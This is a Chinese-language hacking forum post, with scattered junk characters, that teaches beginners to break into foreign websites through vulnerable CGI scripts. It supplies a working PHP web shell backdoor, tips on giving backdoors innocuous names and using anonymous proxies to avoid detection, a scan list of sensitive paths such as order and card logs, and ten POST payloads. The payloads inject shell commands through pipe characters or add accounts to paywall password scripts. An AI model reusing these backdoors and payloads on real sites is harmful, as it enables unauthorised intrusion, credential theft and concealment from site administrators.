CGI 脚本入侵快速上手+脚本使用方法

admin

CGI 脚本入侵快速上手+脚本使用方法
% S0 J# c8 A1 H, X/ e/ M大家好 我是bboyhip  只是一名菜菜的exploiter
很开心来到贵论坛
* {$ m2 \+ O  H这里让我感觉 很有技术交流的感觉
$ Q& F. y6 `: }2 G我会长长来玩的
前言:
6 y0 X& g; H2 u1 h  a: L# D以下讲解针对欧美日本网站
: G3 \5 A. C; L4 W3 ^# o當我們在做滲透分析的時候 方法有很多
3 N: H8 O- t  A我门都知道 国外伺服器大多是linux 平台
所以有很多网站程序有6成都会使用cgi 脚本来管理
: j4 G$ S4 {! O7 g目录为/cgi-bin/
6 n, E4 X3 B* V+ c! v' V
- I9 R1 W6 L% a' K只是个人在实务上一些经验
写的不好 请多多见谅喔
: v* h8 w9 W: p& F在这里我简单分为几个部份一定要會的
( k. T2 @: Q9 ~: Q# _/ T讲解一下
让没有基础的人很容易上手
: ^% O6 O0 Q; Q! f% V
+ g$ E8 s* Y4 I: Q  I* k: m4 s9 L以下内容跟帖回复才能看到
==============================
7 ?( }! b% v4 e% B
第1部份: 何谓Shell?
) v: S# V5 F5 _7 ?, rShell的中文, 可称为 "壳".  Shell 是一个比较复杂的概念, 先看比较传统的解释:
8 Q; r7 t4 V7 G0 k( v6 m. [8 u) v& \A shell is the program which reads user input from the command line and executes actions based upon that input.
# X* v) d1 a  q' ^5 u* ^: F意思是, 通过应用程式(shell), 用户输入指令, 由系统执行该指令.

对於黑客来说, shell是後门, 是入侵/ 控制/ 浏览对方系统的程式/ 方法.  
8 N$ f0 A9 C' R要自行建立一个shell是十分困难的, 因为要先找漏洞, 找到後, 利用该漏洞来写入档案/ 後门.  大家都知道, 有些漏洞只可加码, 有些可读档, 但可以写档的不多.  在数年前, 有一个十分流行及易用的漏洞addpasswd.cgi, 可以写後门, 但时至今日, 绝大部份的addpasswd.cgi已经被删除.
所以, 对於入门的exploiter来说, 先收集别人的後门, 多多练习, 然後再学习做自己的shell.

. P/ M: M) a" k+ w4 c第2部份: Unix 指令
, y9 E& e' [: k6 y以下是一些常见及重要的指令:
) @- U# M, |4 R+ v0 L7 Zpwd: 显示当前目录, 即是後门/程式所在的位置
如 /home/www/site.com/cgi-bin/
0 S- G, L* T. U8 @3 S6 V8 A. o. E/ Lls: 列出档案 (-a 包含隐藏档; -l 包含详细资料).  
1 V) X. Q. `$ L- R' E2 `ls -al :详细列出档案资料(当前目录)
ls /: 列出根目录
ls /etc: 列出/etc的资料夹及档案
' R8 }0 @  i) q' q, Ils ../ -al: 详细列出上一层的资料夹及档案
cat: 显示档案内容
cat .htpasswd: 显示 .htpasswd 这个档案的内容(当前目录)
4 b6 d* W  r8 _& tcat /etc/passwd: 显示 /etc/passwd 这个档案的内容
  P; U5 [# j$ _! q" Pwho: 显示谁login 至系统
. t; M- h  `) Pman: 显示指令用法  
8 [) Y  S: _5 v6 Nman ls: 显示ls这指令的用法  
; L/ {1 O( C! ?% w1 z, `  m" p2 n! J6 Tmkdir 建立目录
rmdir 删除目录
mv 移动档案
rm 删除档案
4 B, d; v" ~6 \' |' ?
第3部份: Shell的使用
5 [. y9 _* L4 S: e9 e例如:
' d( t$ b. i5 Hhttp://site.com/refer.php
0 H1 d* H. g. V9 S这是我的後门, 原代码如下:
<Form Action="#" Method="POST">
<Input type="text" name="cmd">
<Input type="Submit">
5 m2 [/ @: i' a: ^; d' `/ r+ ]' u</Form>
* _' E+ [/ C+ [' q. T! f<?php
  m0 T, c& U% @& @% g6 C4 k$cmd = $_POST['cmd'];
) U4 t# L$ u7 N4 y; R$Output = shell_exec($cmd);
echo $Output;
?>
3 t3 e" e  j6 A1 P输入pwd, 可得到绝对路径:
# h; v1 L$ Q9 A1 d/ N/home/htdocs/users/jnesbitt/jnesbitt/nylonfantasies.com
/ I7 X2 z' ?& E- y8 L2 R: E" g! E0 c- ~
0 W  Z6 _( q& |" C( W第4部份: 注意事项
' X% B) J7 p; l2 ^' A- 使用匿名代理, 保障自己
- 不可恶意破坏, 或更改现有档案, 否则管理员发现了, 不但会删除後门, 可能会有追究行动
0 g9 z, e# P9 i* n- 加後门前, 必须了解目标系统是否支援.  例如, cgi後门, 应放在cgi-bin; 有些系统可能不支援 php後门等.
: e, x( z1 V6 h( k7 f- 加後门前 (如 index.php), 先检查是否已存在该档案名称, 以免覆盖原有档案, 造成破坏.
6 [  c% c5 v0 h* |- 後门的名称, 不可使用hack, crack, exploit等字眼, 最好使用index, index1, log, login, refer, tmp, test, info等, 鱼目混珠,
$ I* O) w8 K7 ]( E  C不容易被发现.
4 C% R- r! `" y. d6 L% L: g- 将後门放在比较隐闭的地方 (例如 /cgi-bin/内, 有很多cgi档案, 比较少php档案)
+ r" Q4 T9 b4 l: i5 [针对网站的渗透分析方法太多了
- x9 g5 ^3 w# x5 O8 P" p+ z; F这篇文章的重点是cgi 脚本攻击
; P5 b( u9 ^3 V) J5 W所以我用简单的叙述形容
1 O/ z' U3 I3 n/ L* g开始讲解脚本入侵过程:
- M& h9 k) M) o2 i: z' l5 k% `( F1 P0 {在这里提供一些方法思路让大家学习一下

1.一开始对一个网站进行cgi漏洞扫描
我们需要的东西有
: i! A+ N8 S' j0 x7 s0 C4 J扫洞工具 如:triton..等等
: `, T5 d+ m) ~9 U+ y* aE表
如
/cgi-bin/add-passwd.cgi
/WebShop/templates/cc.txt
/Admin_files/order.log
" p0 z! m2 W' f: r) K  w/ ]/orders/mountain.cfg
/cgi-sys/cart.pl
/scripts/cart.pl
2 b9 N# ~) ]+ P: F* |) G# B, Z" n& X/htbin/cart.pl
E表来源可以是网路收寻或是自己的0 day

2.怎样确认扫到的洞 是真的还假的?
举例: target: http://www.site.com/cgi-bin/add-passwd.cgi
一般都是在IE里先看一下的,记住这个返回码哦
3 N' Q8 G4 K9 Q6 l5 @ERROR:This script should be referenced with a METHOD of POST.
没有返回一定是假的
3.重来来了 很多人都会问我
他扫到很多洞 但是不会使用
1 r1 V" i1 k  @$ G) n& Z因为这些漏洞 使用的语法 称为post
我们要找post 的方法很多
9 w1 Y& X3 F% a& L可以是源代码分析 找出介质
或是用抓包工具 抓他的语法...等等

以下我提供10个 cgi 洞以及使用方法post
让大家可以针对网站去做扫描  
/ n; a9 Q, c- T7 ~( A3 d( d6 \! }/index.cgi
: g7 L6 {- @  s! }4 ~$ _wei=ren&gen=command
/passmaster.cgi
" n$ \8 L/ t) v4 k. K( b- MAction=Add&Username=Username&Password=Password
/accountcreate.cgi
# i, h* }; h% r. N) busername=username&password=password&ref1=|echo;ls|
/form.cgi
  E& l. Y/ F* kname=xxxx&email=email&subject=xxxx&response=|echo;ls|
/addusr.pl
9 X* R0 V& U$ q4 U/ C) l/cgi-bin/EuroDebit/addusr.pl
user=username&pass=Password&confirm=Password
/ccbill-local.asp
post_values=username:password
" e" r2 V' K$ E: z- \/count.cgi
8 u* q) q  k. W8 r! t* ]( P/ ipinfile=|echo;ls -la;exit|
/recon.cgi
/recon.cgi?search
& ]: L- A4 O! [4 y$ M* Q) nsearchoption=1&searchfor=|echo;ls -al;exit|
/verotelrum.pl
8 t! I0 P  h* q4 D7 J5 {  @vercode=username:password:dseegsow:add:amount<&30>
$ M6 u; J3 x" q/af.cgi_browser_out=|echo;ls -la;exit;|

今天就讲到这  感谢大家支持
2 N( T/ T- K: J7 Y( C